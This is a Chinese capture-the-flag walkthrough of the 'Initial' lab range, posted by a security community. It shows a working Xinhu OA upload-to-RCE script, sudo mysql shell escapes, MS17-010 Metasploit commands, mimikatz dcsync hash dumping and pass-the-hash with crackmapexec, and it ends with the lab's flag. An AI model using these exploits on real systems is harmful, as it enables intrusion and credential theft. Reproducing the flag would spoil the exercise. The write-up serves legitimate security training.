点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
靶场介绍
Initial是一套较为简单的靶场,该靶场较为简单,涉及内网流量代理,frp、proxifier的使用以及横向hash传递攻击,该靶场只有一个flag分布在不同靶机上。
拿到外网shell
开局给ip用nmap扫描端口
开启80,22端口访问发现为thinkphp框架尝试RCE
flag01
进去发现是www-data权限
sudo -l发现mysql可以免密使用
查找第一个flag
sudo mysql -e '! find / -name flag*'
抓取flag
sudo mysql -e '! cat /root/flag/flag01.txt'
flag02
ifconfig发现内网网段 172.22.1.0/24
fscan扫描
内网基本信息
172.22.1.2 DC域控
172.22.1.21 MS17-010永恒之蓝
172.22.1.18 信呼OA系统
frp代理
服务器:frps.ini绑定本地5987端口
目标主机:frpc.ini
proxifier代理(地址为服务器ip)
弱口令 admin admin123
信呼OAexp
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
拿到上传路径getshell
prixifier代理蚁剑流量
拿到flag02
flag03
kali代理流量
vim/etc/proxychains4.conf
hash传递攻击
msf攻击
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
调用mimikatz抓取hash
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
使用crackmapexec攻击访问DC
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type UsersAdministratorflagflag03.txt"
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
!感谢03Scx12师傅投稿!
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
企业简介
赛克艾威 – 网络安全解决方案提供商
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,提供全面的安全解决方案和专业的技术服务,帮助客户保护数字资产和网络环境的安全。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:sechub安全
哔哩号:SecHub官方账号
原文始发于微信公众号(SecHub网络安全社区):春秋云境仿真场景WP:Initial
